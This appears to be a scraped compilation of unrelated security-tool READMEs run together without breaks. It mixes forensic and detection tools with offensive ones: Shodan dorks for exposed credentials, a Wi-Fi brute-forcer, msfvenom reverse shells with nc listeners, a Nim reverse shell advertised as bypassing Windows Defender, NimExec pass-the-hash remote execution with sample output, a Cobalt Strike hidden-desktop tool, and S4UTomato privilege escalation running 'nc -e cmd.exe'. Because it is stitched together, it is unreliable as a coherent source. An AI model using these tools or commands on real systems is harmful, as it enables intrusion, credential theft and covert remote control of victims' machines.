"SERVER: EPSON_Linux UPnP" "200 OK"
"Server: EPSON-HTTP" "200 OK"
"Server: KS_HTTP" "200 OK"
"Server: CANON HTTP Server"
"Server: AV_Receiver" "HTTP/1.1 406"
Apple TVs, HomePods, etc.
"\x08_airplay" port:5353
"Chromecast:" port:8008
"Model: PYNG-HUB"
"Server: calibre" http.status:200 http.title:calibre
title:"OctoPrint" -title:"Login" http.favicon.hash:1307375944
"ETH - Total speed"
Substitute .pem with any extension or a filename like phpinfo.php.
http.title:"Index of /" http.html:".pem"
Exposed wp-config.php files containing database credentials.
http.html:"* The wp-config.php creation script uses this file"
"Minecraft Server" "protocol 340" port:25565
net:175.45.176.0/22,210.52.109.0/24,77.94.35.0/24
GTFOcli
it's a Command Line Interface for easy binaries search commands that can be used to bypass local security restrictions in misconfigured systems.
Using go
:
go install github.com/cmd-tools/gtfocli@latest
Using homebrew
:
brew tap cmd-tools/homebrew-tap
brew install gtfocli
Using docker
:
docker pull cmdtoolsowner/gtfocli
Search for binary tar
:
gtfocli search tar
Search for binary tar
from stdin
:
echo "tar" | gtfocli search
Search for binaries located into file;
cat myBinaryList.txt
/bin/bash
/bin/sh
tar
arp
/bin/tail
gtfocli search -f myBinaryList.txt
Search for binary Winget.exe
:
gtfocli search Winget --os windows
Search for binary Winget
from stdin
:
echo "Winget" | gtfocli search --os windows
Search for binaries located into file:
cat windowsExecutableList.txt
Winget
c:\\Users\\Desktop\\Ssh
Stordiag
Bash
c:\\Users\\Runonce.exe
Cmdkey
c:\dir\subDir\Users\Certreq.exe
gtfocli search -f windowsExecutableList.txt --os windows
Search for binary Winget
and print output in yaml
format (see -h
for available formats):
gtfocli search Winget -o yaml --os windows
Examples:
Search for binary Winget
and print output in yaml
format:
docker run -i cmdtoolsowner/gtfocli search Winget -o yaml --os windows
Search for binary tar
and print output in json
format:
echo 'tar' | docker run -i cmdtoolsowner/gtfocli search -o json
Search for binaries located into file mounted as volume in the container:
cat myBinaryList.txt
/bin/bash
/bin/sh
tar
arp
/bin/tail
docker run -i -v $(pwd):/tmp cmdtoolsowner/gtfocli search -f /tmp/myBinaryList.txt
An example of common use case for gtfocli
is together with find
:
find / -type f \( -perm 04000 -o -perm -u=s \) -exec gtfocli search {} \; 2>/dev/null
or
find / -type f \( -perm 04000 -o -perm -u=s \) 2>/dev/null | gtfocli search
Thanks to GTFOBins and LOLBAS, without these projects gtfocli
would never have come to light.
You want to contribute to this project? Wow, thanks! So please just fork it and send a pull request.
WinFiHack is a recreational attempt by me to rewrite my previous project Brute-Hacking-Framework's main wifi hacking script that uses netsh and native Windows scripts to create a wifi bruteforcer. This is in no way a fast script nor a superior way of doing the same hack but it needs no external libraries and just Python and python scripts.
The packages are minimal or nearly none ๐ . The package install command is:
pip install rich pyfiglet
Thats it.
So listing the features:
rich
.So this is how the bruteforcer works:
Provide Interface:
The user is required to provide the network interface for the tool to use.
By default, the interface is set to Wi-Fi
.
Search and Set Target:
The user must search for and select the target network.
During this process, the tool performs the following sub-steps:
Input Password File:
The user inputs the path to the password file.
The default path for the password file is ./wordlist/default.txt
.
Run the Attack:
With the target set and the password file ready, the tool is now prepared to initiate the attack.
Attack Procedure:
After installing all the packages just run python main.py
rest is history ๐ make sure you run this on Windows cause this won't work on any other OS. The interface looks like this:
For contributions: - First Clone: First Clone the repo into your dev env and do the edits. - Comments: I would apprtiate if you could add comments explaining your POV and also explaining the upgrade. - Submit: Submit a PR for me to verify the changes and apprive it if necessary.
A script to automate keystrokes through an active remote desktop session that assists offensive operators in combination with living off the land techniques.
All credits goes to nopernik for making it possible so I took it upon myself to improve it. I wanted something that helps during the post exploitation phase when executing commands through a remote desktop.
$ ./rks.sh -h
Usage: ./rks.sh (RemoteKeyStrokes)
Options:
-c, --command <command | cmdfile> Specify a command or a file containing to execute
-i, --input <input_file> Specify the local input file to transfer
-o, --output <output_file> Specify the remote output file to transfer
-m, --method <method> Specify the file transfer or execution method
(For file transfer "base64" is set by default if
not specified. For execution method "none" is set
by default if not specified)
-p, --platform <operating_system> Specify the operating system (windows is set by
default if not specified)
-w, --windowname <name> Specify t he window name for graphical remote
program (freerdp is set by default if not
specified)
-h, --help Display this help message
$ cat recon_cmds.txt
whoami /all
net user
net localgroup Administrators
net user /domain
net group "Domain Admins" /domain
net group "Enterprise Admins" /domain
net group "Domain Computers" /domain
$ ./rks.h -c recon_cmds.txt
$ msfvenom -p windowx/x64/shell_reverse_tcp lhost=<IP> lport=4444 -f psh -o implant.ps1
$ ./rks.sh -c implant.ps1
$ nc -lvnp 4444
$ ./rks.sh -i /usr/share/powersploit/Privesc/PowerUp.ps1 -o script.ps1
$ ./rks.sh -i /usr/share/powersploit/Exfiltration/Invoke-Mimikatz.ps1 -o "C:\Windows\Temp\update.ps1" -m base64
tightvnc
.$ ./rks.sh -i implant.ps1 -w tightvnc
rdesktop
.$ ./rks.sh -i implant.bat -w rdesktop
Add text colors for better user experience
Implement Base64 file transfer
Implement Bin2Hex file transfer
Implement a persistence function for both windows and linux.
Implement antiforensics function for both windows and linux.
Implement to read shellcode input and run C# implant and powershell runspace
Implement privesc function for both windows and linux
With the rapidly increasing variety of attack techniques and a simultaneous rise in the number of detection rules offered by EDRs (Endpoint Detection and Response) and custom-created ones, the need for constant functional testing of detection rules has become evident. However, manually re-running these attacks and cross-referencing them with detection rules is a labor-intensive task which is worth automating.
To address this challenge, I developed "PurpleKeep," an open-source initiative designed to facilitate the automated testing of detection rules. Leveraging the capabilities of the Atomic Red Team project which allows to simulate attacks following MITRE TTPs (Tactics, Techniques, and Procedures). PurpleKeep enhances the simulation of these TTPs to serve as a starting point for the evaluation of the effectiveness of detection rules.
Automating the process of simulating one or multiple TTPs in a test environment comes with certain challenges, one of which is the contamination of the platform after multiple simulations. However, PurpleKeep aims to overcome this hurdle by streamlining the simulation process and facilitating the creation and instrumentation of the targeted platform.
Primarily developed as a proof of concept, PurpleKeep serves as an End-to-End Detection Rule Validation platform tailored for an Azure-based environment. It has been tested in combination with the automatic deployment of Microsoft Defender for Endpoint as the preferred EDR solution. PurpleKeep also provides support for security and audit policy configurations, allowing users to mimic the desired endpoint environment.
To facilitate analysis and monitoring, PurpleKeep integrates with Azure Monitor and Log Analytics services to store the simulation logs and allow further correlation with any events and/or alerts stored in the same platform.
TLDR: PurpleKeep provides an Attack Simulation platform to serve as a starting point for your End-to-End Detection Rule Validation in an Azure-based environment.
The project is based on Azure Pipelines and requires the following to be able to run:
You can provide a security and/or audit policy file that will be loaded to mimic your Group Policy configurations. Use the Secure File option of the Library in Azure DevOps to make it accessible to your pipelines.
Refer to the variables file for your configurable items.
Deploying the infrastructure uses the Azure Pipeline to perform the following steps:
Currently only the Atomics from the public repository are supported. The pipelines takes a Technique ID as input or a comma seperate list of techniques, for example:
The logs of the simulation are ingested into the AtomicLogs_CL table of the Log Analytics Workspace.
There are currently two ways to run the simulation:
This pipeline will deploy a fresh platform after the simulation of each TTP. The Log Analytic workspace will maintain the logs of each run.
Warning: this will onboard a large number of hosts into your EDR
A fresh infrastructure will be deployed only at the beginning of the pipeline. All TTP's will be simulated on this instance. This is the fastests way to simulate and prevents onboarding a large number of devices, however running a lot of simulations in a same environment has the risk of contaminating the environment and making the simulations less stable and predictable.
Pantheon is a GUI application that allows users to display information regarding network cameras in various countries as well as an integrated live-feed for non-protected cameras.
Pantheon allows users to execute an API crawler. There was original functionality without the use of any API's (like Insecam), but Google TOS kept getting in the way of the original scraping mechanism.
git clone https://github.com/josh0xA/Pantheon.git
cd Pantheon
pip3 install -r requirements.txt
python3 pantheon.py
chmod +x distros/ubuntu_install.sh
./distros/ubuntu_install.sh
chmod +x distros/debian-kali_install.sh
./distros/debian-kali_install.sh
(Enter) on a selected IP:Port to establish a Pantheon webview of the camera. (Use this at your own risk)
(Left-click) on a selected IP:Port to view the geolocation of the camera.
(Right-click) on a selected IP:Port to view the HTTP data of the camera (Ctrl+Left-click for Mac).
Adjust the map as you please to see the markers.
The developer of this program, Josh Schiavone, is not resposible for misuse of this data gathering tool. Pantheon simply provides information that can be indexed by any modern search engine. Do not try to establish unauthorized access to live feeds that are password protected - that is illegal. Furthermore, if you do choose to use Pantheon to view a live-feed, do so at your own risk. Pantheon was developed for educational purposes only. For further information, please visit: https://joshschiavone.com/panth_info/panth_ethical_notice.html
MIT License
Copyright (c) Josh Schiavone
Flutter Mobile Application Reverse Engineering Tool by Compiling Dart AOT Runtime
Currently the application supports only Android libapp.so (arm64 only). Also the application is currently work only against recent Dart versions.
For high priority missing features, see TODO
This application uses C++20 Formatting library. It requires very recent C++ compiler such as g++>=13, Clang>=15.
I recommend using Linux OS (only tested on Deiban sid/trixie) because it is easy to setup.
apt install python3-pyelftools python3-requests git cmake ninja-build \
build-essential pkg-config libicu-dev libcapstone-dev
python scripts\init_env_win.py
brew install llvm@15 cmake ninja pkg-config icu4c capstone
pip3 install pyelftools requests
Extract "lib" directory from apk file
python3 blutter.py path/to/app/lib/arm64-v8a out_dir
The blutter.py will automatically detect the Dart version from the flutter engine and call executable of blutter to get the information from libapp.so.
If the blutter executable for required Dart version does not exists, the script will automatically checkout Dart source code and compiling it.
You can use git pull
to update and run blutter.py with --rebuild
option to force rebuild the executable
python3 blutter.py path/to/app/lib/arm64-v8a out_dir --rebuild
I use Visual Studio to delevlop Blutter on Windows. --vs-sln
options can be used to generate a Visual Studio solution.
python blutter.py path\to\lib\arm64-v8a build\vs --vs-sln
Like its Windows counterpart, Winpmem, this is not a traditional memory dumper. Linpmem offers an API for reading from any physical address, including reserved memory and memory holes, but it can also be used for normal memory dumping. Furthermore, the driver offers a variety of access modes to read physical memory, such as byte, word, dword, qword, and buffer access mode, where buffer access mode is appropriate in most standard cases. If reading requires an aligned byte/word/dword/qword read, Linpmem will do precisely that.
Currently, the Linpmem features:
Cache Control is to be added in future for support of the specialized read access modes.
At least for now, you must compile the Linpmem driver yourself. A method to load a precompiled Linpmem driver on other Linux systems is currently under work, but not finished yet. That said, compiling the Linpmem driver is not difficult, basically it's executing 'make'.
You need make
and a C compiler. (We recommend gcc, but clang should work as well).
Make sure that you have the linux-headers
installed (using whatever package manager your target linux distro has). The exact package name may vary on your distribution. A quick (distro-independent) way to check if you have the package installed:
ls -l /usr/lib/modules/`uname -r`/
That's it, you can proceed to step 2.
Foreign system: Currently, if you want to compile the driver for another system, e.g., because you want to create a memory dump but can't compile on the target, you have to download the header package directly from the package repositories of that system's Linux distribution. Double-check that the package version exactly matches the release and kernel version running on the foreign system. In case the other system is using a self-compiled kernel you have to obtain a copy of that kernel's build directory. Then, place the location of either directory in the KDIR
environment variable.
export KDIR=path/to/extracted/header/package/or/kernel/root
Compiling the driver is simple, just type:
make
This should produce linpmem.ko
in the current working directory.
You might want to check precompiler.h
before and chose whether to compile for release or debug (e.g., with debug printing). There aren't much other precompiler settings right now.
The linpmem.ko module can be loaded by using insmod path-to-linpmem.ko
, and unloaded with rmmod path-to-linpmem.ko
. (This will load the driver only for this uptime.) If you compiled for debug, also take a look at dmesg.
After loading, for talking to the driver, you need to create the device:
mknod /dev/linpmem c 42 0
If you can't talk to the driver, potentially check in dmesg log to verify that '42' was indeed the registered major:
[12827.900168] linpmem: registered chrdev with major 42
Though usually the kernel would try to really assign this number.
You can use chown
on the device to give it to your user, if you do not want to have a root console open all the time. (Or just keep using it in a root console.)
There is an example code demonstrating and explaining (in detail) how to interact with the driver. The user-space API reference can furthermore be found in ./userspace_interface/linpmem_shared.h
.
This code is important, if you want to understand how to directly interact with the driver instead of using a library. It can also be used as a short function test.
There is an (optional) basic command line interface tool to Linpmem, the pmem CLI tool. It can be found here: https://github.com/vobst/linpmem-cli. Aside from the source code, there is also a precompiled CLI tool as well as the precompiled static library and headers that can be found here (signed). Note: this is a preliminary version, be sure to check for updates, as many additions and enhancements will follow soon.
The pmem CLI tool can be used for testing the various functions of Linpmem in a (relatively) safe and convenient manner. Linpmem can also be loaded by this tool instead of using insmod/rmmod, with some extra options in future. This also has the advantage that pmem auto-creates the right device for you for immediate use. It is extremely portable and runs on any Linux system (and, in fact, has been tested even on a Linux 2.6).
$ ./pmem -h
Command-line client for the linpmem driver
Usage: pmem [OPTIONS] [COMMAND]
Commands:
insmod Load the linpmem driver
help Print this message or the help of the given subcommand(s)
Options:
-a, --address <ADDRESS> Address for physical read operations
-v, --virt-address <VIRT_ADDRESS> Translate address in target process' address space (default: current process)
-s, --size <SIZE> Size of buffer read operations
-m, --mode <MODE> Access mode for read operations [possible values: byte, word, dword, qword, buffer]
-p, --pid <PID> Target process for cr3 info and virtual-to-physical translations
--cr3 Query cr3 value of target process (default: current process)
--verbose Display debug output
-h, --help Print help (see more with '--help')
-V, --version Print version
If you want to compile the cli tool yourself, change to its directory and follow the instructions in the (cli) Readme to build it. Otherwise, just download the prebuilt program, it should work on any Linux. To load the kernel driver with the cli tool:
# pmem insmod path/to/linpmem.ko
The advantage of using the pmem tool to load the driver is that you do not have to create the device file yourself, and it will offer (on next releases) to choose who owns the linpmem device.
The pmem command line interface is only a thin wrapper around a small Rust library that exposes an API for interfacing with the driver. More advanced users can also use this library. The library is automatically compiled (as static portable library) along with the pmem cli tool when compiling from https://github.com/vobst/linpmem-cli, but also included (precompiled) here (signed). Note: this is a preliminary version, more to follow soon.
If you do not want to use the usermode library and prefer to interface with the driver directly on your own, you can find its user-space API/interface and documentation in ./userspace_interface/linpmem_shared.h
. We also provide example code in demo/test.c
that explains how to use the driver directly.
Not implemented yet.
If the system reports the following error message when loading the module, it might be because of secure boot:
$ sudo insmod linpmem.ko
insmod: ERROR: could not insert module linpmem.ko: Operation not permitted
There are different ways to still load the module. The obvious one is to disable secure boot in your UEFI settings.
If your distribution supports it, a more elegant solution would be to sign the module before using it. This can be done using the following steps (tested on Ubuntu 20.04).
$ sudo apt install mokutil
$ openssl req -new -newkey rsa:4096 -keyout mok-signing.key -out mok-signing.crt -outform DER -days 365 -nodes -subj "/CN=Some descriptive name/"
$ sudo mokutil --import mok-signing.crt
$ /usr/src/linux-headers-$(uname -r)/scripts/sign-file sha256 path/to/mok-singing/MOK.key path/to//MOK.cert path/to/linpmem.ko
After that, you should be able to load the module.
Note that from a forensic-readiness perspective, you should prepare a signed module before you need it, as the system will reboot twice during the process described above, destroying most of your volatile data in memory.
(Please report potential issues if you encounter anything.)
Linpmem, as well as Winpmem, would not exist without the work of our predecessors of the (now retired) REKALL project: https://github.com/google/rekall.
Our open source contributors:
Reverse shell that can bypass windows defender detection
$ apt install nim
nim c -d:mingw --app:gui nimshell.nim
Change the IP address and port number you want to listen to in the nimshell.nim file according to your device.
$ nc -nvlp 4444
DOUGLAS-042 stands as an ingenious embodiment of a PowerShell script meticulously designed to expedite the triage process and facilitate the meticulous collection of crucial evidence derived from both forensic artifacts and the ephemeral landscape of volatile data. Its fundamental mission revolves around providing indispensable aid in the arduous task of pinpointing potential security breaches within Windows ecosystems. With an overarching focus on expediency, DOUGLAS-042 orchestrates the efficient prioritization and methodical aggregation of data, ensuring that no vital piece of information eludes scrutiny when investigating a possible compromise. As a testament to its organized approach, the amalgamated data finds its sanctuary within the confines of a meticulously named text file, bearing the nomenclature of the host system's very own hostname. This practice of meticulous data archival emerges not just as a systematic convention, but as a cornerstone that paves the way for seamless transitions into subsequent stages of the Forensic journey.
Using administrative privileges, just run the script from a PowerShell console, then the results will be saved in the directory as a txt file.
$ PS >./douglas.ps1
$ PS >./douglas.ps1 -a
py-amsi is a library that scans strings or files for malware using the Windows Antimalware Scan Interface (AMSI) API. AMSI is an interface native to Windows that allows applications to ask the antivirus installed on the system to analyse a file/string. AMSI is not tied to Windows Defender. Antivirus providers implement the AMSI interface to receive calls from applications. This library takes advantage of the API to make antivirus scans in python. Read more about the Windows AMSI API here.
Via pip
pip install pyamsi
Clone repository
git clone https://github.com/Tomiwa-Ot/py-amsi.git
cd py-amsi/
python setup.py install
from pyamsi import Amsi
# Scan a file
Amsi.scan_file(file_path, debug=True) # debug is optional and False by default
# Scan string
Amsi.scan_string(string, string_name, debug=False) # debug is optional and False by default
# Both functions return a dictionary of the format
# {
# 'Sample Size' : 68, // The string/file size in bytes
# 'Risk Level' : 0, // The risk level as suggested by the antivirus
# 'Message' : 'File is clean' // Response message
# }
Risk Level | Meaning |
---|---|
0 | AMSI_RESULT_CLEAN (File is clean) |
1 | AMSI_RESULT_NOT_DETECTED (No threat detected) |
16384 | AMSI_RESULT_BLOCKED_BY_ADMIN_START (Threat is blocked by the administrator) |
20479 | AMSI_RESULT_BLOCKED_BY_ADMIN_END (Threat is blocked by the administrator) |
32768 | AMSI_RESULT_DETECTED (File is considered malware) |
https://tomiwa-ot.github.io/py-amsi/index.html
Basically, NimExec is a fileless remote command execution tool that uses The Service Control Manager Remote Protocol (MS-SCMR). It changes the binary path of a random or given service run by LocalSystem to execute the given command on the target and restores it later via hand-crafted RPC packets instead of WinAPI calls. It sends these packages over SMB2 and the svcctl named pipe.
NimExec needs an NTLM hash to authenticate to the target machine and then completes this authentication process with the NTLM Authentication method over hand-crafted packages.
Since all required network packages are manually crafted and no operating system-specific functions are used, NimExec can be used in different operating systems by using Nim's cross-compilability support.
This project was inspired by Julio's SharpNoPSExec tool. You can think that NimExec is Cross Compilable and built-in Pass the Hash supported version of SharpNoPSExec. Also, I learned the required network packet structures from Kevin Robertson's Invoke-SMBExec Script.
nim c -d:release --gc:markAndSweep -o:NimExec.exe Main.nim
The above command uses a different Garbage Collector because the default garbage collector in Nim is throwing some SIGSEGV errors during the service searching process.
Also, you can install the required Nim modules via Nimble with the following command:
nimble install ptr_math nimcrypto hostname
test@ubuntu:~/Desktop/NimExec$ ./NimExec -u testuser -d TESTLABS -h 123abcbde966780cef8d9ec24523acac -t 10.200.2.2 -c 'cmd.exe /c "echo test > C:\Users\Public\test.txt"' -v
_..._
.-'_..._''.
_..._ .--. __ __ ___ __.....__ __.....__ .' .' '.\
.' '. |__|| |/ `.' `. .-'' '. .-'' '. / .'
. .-. ..--.| .-. .-. ' / .-''"'-. `. / .-''"'-. `. . '
| ' ' || || | | | | |/ /________\ \ ____ _____/ /________\ \| |
| | | || || | | | | || |`. \ .' /| || |
| | | || || | | | | |\ .--- ----------' `. `' .' \ .-------------'. '
| | | || || | | | | | \ '-.____...---. '. .' \ '-.____...---. \ '. .
| | | ||__||__| |__| |__| `. .' .' `. `. .' '. `._____.-'/
| | | | `''-...... -' .' .'`. `. `''-...... -' `-.______ /
| | | | .' / `. `. `
'--' '--' '----' '----'
@R0h1rr1m
[+] Connected to 10.200.2.2:445
[+] NTLM Authentication with Hash is succesfull!
[+] Connected to IPC Share of target!
[+] Opened a handle for svcctl pipe!
[+] Bound to the RPC Interface!
[+] RPC Binding is acknowledged!
[+] SCManager handle is obtained!
[+] Number of obtained services: 265
[+] Selected service is LxpSvc
[+] Service: LxpSvc is opened!
[+] Previous Service Path is: C:\Windows\system32\svchost.exe -k netsvcs
[+] Service config is changed!
[!] StartServiceW Return Value: 1053 (ERROR_SERVICE_REQUEST_TIMEOUT)
[+] Service start request is sent!
[+] Service config is restored!
[+] Service handle is closed!
[+] Service Manager handle is closed!
[+] SMB is closed!
[+] Tree is disconnected!
[+] Session logoff!
It's tested against Windows 10&11, Windows Server 16&19&22 from Ubuntu 20.04 and Windows 10 machines.
-v | --verbose Enable more verbose output.
-u | --username <Username> Username for NTLM Authentication.*
-h | --hash <NTLM Hash> NTLM password hash for NTLM Authentication.*
-t | --target <Target> Lateral movement target.*
-c | --command <Command> Command to execute.*
-d | --domain <Domain> Domain name for NTLM Authentication.
-s | --service <Service Name> Name of the service instead of a random one.
--help Show the help message.
Hidden Desktop (often referred to as HVNC) is a tool that allows operators to interact with a remote desktop session without the user knowing. The VNC protocol is not involved, but the result is a similar experience. This Cobalt Strike BOF implementation was created as an alternative to TinyNuke/forks that are written in C++.
There are four components of Hidden Desktop:
BOF initializer: Small program responsible for injecting the HVNC code into the Beacon process.
HVNC shellcode: PIC implementation of TinyNuke HVNC.
Server and operator UI: Server that listens for connections from the HVNC shellcode and a UI that allows the operator to interact with the remote desktop. Currently only supports Windows.
Application launcher BOFs: Set of Beacon Object Files that execute applications in the new desktop.
Download the latest release or compile yourself using make
. Start the HVNC server on a Windows machine accessible from the teamserver. You can then execute the client with:
HiddenDesktop <server> <port>
You should see a new blank window on the server machine. The BOF does not execute any applications by default. You can use the application launcher BOFs to execute common programs on the new desktop:
hd-launch-edge
hd-launch-explorer
hd-launch-run
hd-launch-cmd
hd-launch-chrome
You can also launch programs through File Explorer using the mouse and keyboard. Other applications can be executed using the following command:
hd-launch <command> [args]
rportfwd
. Status updates are sent back to Beacon through a named pipe.InputHandler
function in the HVNC shellcode. It uses BeaconInjectProcess
to execute the shellcode, meaning the behavior can be customized in a Malleable C2 profile or with process injection BOFs. You could modify Hidden Desktop to target remote processes, but this is not currently supported. This is done so the BOF can exit and the HVNC shellcode can continue running.InputHandler
creates a new named pipe for Beacon to connect to. Once a connection has been established, the specified desktop is opened (OpenDesktopA
) or created (CreateDesktopA
). A new socket is established through a reverse port forward (rportfwd
) to the HVNC server. The input handler creates a new thread for the DesktopHandler
function described below. This thread will receive mouse and keyboard input from the HVNC server and forward it to the desktop.DesktopHandler
establishes an additional socket connection to the HVNC server through the reverse port forward. This thread will monitor windows for changes and forward them to the HVNC server.The HiddenDesktop BOF was tested using example.profile on the following Windows versions/architectures:
Red Canary Mac Monitor is an advanced, stand-alone system monitoring tool tailor-made for macOS security research, malware triage, and system troubleshooting. Harnessing Apple Endpoint Security (ES), it collects and enriches system events, displaying them graphically, with an expansive feature set designed to surface only the events that are relevant to you. The telemetry collected includes process, interprocess, and file events in addition to rich metadata, allowing users to contextualize events and tell a story with ease. With an intuitive interface and a rich set of analysis features, Red Canary Mac Monitor was designed for a wide range of skill levels and backgrounds to detect macOS threats that would otherwise go unnoticed. As part of Red Canaryโs commitment to the research community, the Mac Monitor distribution package is available to download for free.
Apple Silicon
machine, but Intel
works too!4GB+
is recommended13.1+
(Ventura)Homebrew?
brew install --cask red-canary-mac-monitor
Red Canary Mac Monitor.app
Full Disk Access
-- you'll need to flip the switch to enable this for the Red Canary Security Extension
. Full Disk Access is a requirement of Endpoint Security./Applications/Red Canary Mac Monitor.app
w/signing identifier of com.redcanary.agent
./Library/SystemExtensions/../com.redcanary.agent.securityextension.systemextension
w/signing identifier of com.redcanary.agent.securityextension.systemextension
.Homebrew?
brew uninstall red-canary-mac-monitor
. When using this option you will likely be prompted to authenticate to remove the System Extension.
1.0.3
) Supports removal using the ../Contents/SharedSupport/uninstall.sh
script.Homebrew?
brew update && brew upgrade red-canary-mac-monitor
. When using this option you will likely be prompted to authenticate to remove the System Extension.
Here we'll be hosting:
Releases
section. Each major build corresponds to a code name. The first of these builds is GoldCardinal
.Telemetry reports/
(i.e. all the artifacts that can be collected by the Security Extension).Iconography/
Mute sets/
AtomicESClient
is a seperate, but very closely related project showing the ropes of Endpoint Security check it out in: AtomicESClient/
Additionally, you can submit feature requests and bug reports here as well. When creating a new Issue you'll be able to use one of the two provided templates. Both of these options are also accessible from the in-app "Help" menu.
Each release of Red Canary Mac Monitor has a corresponding build name and version number. The first release has the build name of: GoldCardinal
and version number 1.0.1
.
High fidelity ES events modeled and enriched with some events containing further enrichment. For example, a process being File Quarantine-aware, a file being quarantined, code signing certificates, etc.
Dynamic runtime ES event subscriptions. You have the ability to on-the-fly modify your event subscriptions -- enabling you to cut down on noise while you're working through traces.
Path muting at the API level -- Apple's Endpoint Security team has put a lot of work recently into enabling advanced path muting / inversion capabilities. Here, we cover the majority of the API features: es_mute_path
and es_mute_path_events
along with the types of ES_MUTE_PATH_TYPE_PREFIX
, ES_MUTE_PATH_TYPE_LITERAL
, ES_MUTE_PATH_TYPE_TARGET_PREFIX
, and ES_MUTE_PATH_TYPE_TARGET_LITERAL
. Right now we do not support inversion. I'd love it if the ES team added inversion on a per-event basis instead of per-client.
Detailed event facts. Right click on any event in a table row to access event metadata, filtering, muting, and unsubscribe options. Core to the user experience is the ability to drill down into any given event or set of events. To enable this functionality weโve developed โEvent factsโ windows which contain metadata / additional enrichment about any given event. Each event has a curated set metadata that is displayed. For example, process execution events will generally contain code signing information, environment variables, correlated events, etc. Below you see examples of file creation and BTM launch item added event facts.
Event correlation is an exceptionally important component in any analyst's tool belt. The ability to see which events are "related" to one-another enables you to manipulate the telemetry in a way that makes sense (other than simply dumping to JSON or representing an individual event). We perform event correlation at the process level -- this means that for any given event (which have an initiating and/or target process) we can deeply link events that any given process instigated.
Process grouping is another helpful way to represent process telemetry around a given ES_EVENT_TYPE_NOTIFY_EXEC
or ES_EVENT_TYPE_NOTIFY_FORK
event. By grouping processes in this way you can easily identify the chain of activity.
Artifact filtering enabled users to remove (but not destroy) events from view based on: event type, initiating process path, or target process path. This standout feature enables analysts to cut through the noise quickly while still retaining all data.
com.redcanary.agent.securityextension
) will not needlessly utilize resources / battery power when a trace is not occurring.We know how much you would love to learn from the source code and/or build tools or commercial products on top of this. Currently, however, Mac Monitor will be distributed as a free, closed-source tool. Enjoy what's being offered and please continue to provide your great feedback. Additionally, never hesitate to reach out if there's one aspect of the implementation you'd love to learn more about. We're an open book when it comes to geeking out about all things implementation, usage, and research methodology.
Escalate Service Account To LocalSystem via Kerberos.
Friends familiar with the "Potato" series of privilege escalation should know that it can elevate service account privileges to local system privileges. The early exploitation techniques of "Potato" are almost identical: leveraging certain features of COM interfaces, deceiving the NT AUTHORITY\SYSTEM account to connect and authenticate to an attacker-controlled RPC server. Then, through a series of API calls, an intermediary (NTLM Relay) attack is executed during this authentication process, resulting in the generation of an access token for the NT AUTHORITY\SYSTEM account on the local system. Finally, this token is stolen, and the CreatePr ocessWithToken()
or CreateProcessAsUser()
function is used to pass the token and create a new process to obtain SYSTEM privileges.
In any scenario where a machine is joined to a domain, you can leverage the aforementioned techniques for local privilege escalation as long as you can run code under the context of a Windows service account or a Microsoft virtual account, provided that the Active Directory hasn't been hardened to fully defend against such attacks.
In a Windows domain environment, SYSTEM, NT AUTHORITY\NETWORK SERVICE, and Microsoft virtual accounts are used for authentication by system computer accounts that are joined to the domain. Understanding this is crucial because in modern versions of Windows, most Windows services run by default using Microsoft virtual accounts. Notably, IIS and MSSQL use these virtual accounts, and I believe other applications might also employ them. Therefore, we can abuse the S4U extension to obtain the service ticket for the domain administrator account "Administrator" on the local machine. Then, with the help of James Forshaw (@tiraniddo)'s SCMUACBypass, we can use that ticket to create a system service and ga in SYSTEM privileges. This achieves the same effect as traditional methods used in the "Potato" family of privilege escalation techniques.
Before this, we need to obtain a TGT (Ticket Granting Ticket) for the local machine account. This is not easy because of the restrictions imposed by service account permissions, preventing us from obtaining the computer's Long-term Key and thus being unable to construct a KRB_AS_REQ request. To accomplish the aforementioned goal, I leveraged three techniques: Resource-based Constrained Delegation, Shadow Credentials, and Tgtdeleg. I built my project based on the Rubeus toolset.
C:\Users\whoami\Desktop>S4UTomato.exe --help
S4UTomato 1.0.0-beta
Copyright (c) 2023
-d, --Domain Domain (FQDN) to authenticate to.
-s, --Server Host name of domain controller or LDAP server.
-m, --ComputerName The new computer account to create.
-p, --ComputerPassword The password of the new computer account to be created.
-f, --Force Forcefully update the 'msDS-KeyCredentialLink' attribute of the computer
object.
-c, --Command Program to run.
-v, --Verbose Output verbose debug information.
--help Display this help screen.
--version Display version information.
S4UTomato.exe rbcd -m NEWCOMPUTER -p pAssw0rd -c "nc.exe 127.0.0.1 4444 -e cmd.exe"
S4UTomato.exe shadowcred -c "nc 127.0.0.1 4444 -e cmd.exe" -f
# First retrieve the TGT through Tgtdeleg
S4UTomato.exe tgtdeleg
# Then run SCMUACBypass to obtain SYSTEM privilege
S4UTomato.exe krbscm -c "nc 127.0.0.1 4444 -e cmd.exe"
Dissect is a digital forensics & incident response framework and toolset that allows you to quickly access and analyse forensic artefacts from various disk and file formats, developed by Fox-IT (part of NCC Group).
This project is a meta package, it will install all other Dissect modules with the right combination of versions. For more information, please see the documentation.
Dissect is an incident response framework build from various parsers and implementations of file formats. Tying this all together, Dissect allows you to work with tools named target-query
and target-shell
to quickly gain access to forensic artefacts, such as Runkeys, Prefetch files, and Windows Event Logs, just to name a few!
Singular approach
And the best thing: all in a singular way, regardless of underlying container (E01, VMDK, QCoW), filesystem (NTFS, ExtFS, FFS), or Operating System (Windows, Linux, ESXi) structure / combination. You no longer have to bother extracting files from your forensic container, mount them (in case of VMDKs and such), retrieve the MFT, and parse it using a separate tool, to finally create a timeline to analyse. This is all handled under the hood by Dissect in a user-friendly manner.
If we take the example above, you can start analysing parsed MFT entries by just using a command like target-query -f mft <PATH_TO_YOUR_IMAGE>
!
Create a lightweight container using Acquire
Dissect also provides you with a tool called acquire
. You can deploy this tool on endpoint(s) to create a lightweight container of these machine(s). What is convenient as well, is that you can deploy acquire
on a hypervisor to quickly create lightweight containers of all the (running) virtual machines on there! All without having to worry about file-locks. These lightweight containers can then be analysed using the tools like target-query
and target-shell
, but feel free to use other tools as well.
A modular setup
Dissect is made with a modular approach in mind. This means that each individual project can be used on its own (or in combination) to create a completely new tool for your engagement or future use!
Try it out now!
Interested in trying it out for yourself? You can simply pip install dissect
and start using the target-*
tooling right away. Or you can use the interactive playground at https://try.dissect.tools to try Dissect in your browser.
Donโt know where to start? Check out the introduction page.
Want to get a detailed overview? Check out the overview page.
Want to read everything? Check out the documentation.
Dissect currently consists of the following projects.
These projects are closely related to Dissect, but not installed by this meta package.
This project is part of the Dissect framework and requires Python.
Information on the supported Python versions can be found in the Getting Started section of the documentation.
dissect
is available on PyPI.
pip install dissect
This project uses tox
to build source and wheel distributions. Run the following command from the root folder to build these:
tox -e build
The build artifacts can be found in the dist/
directory.
tox
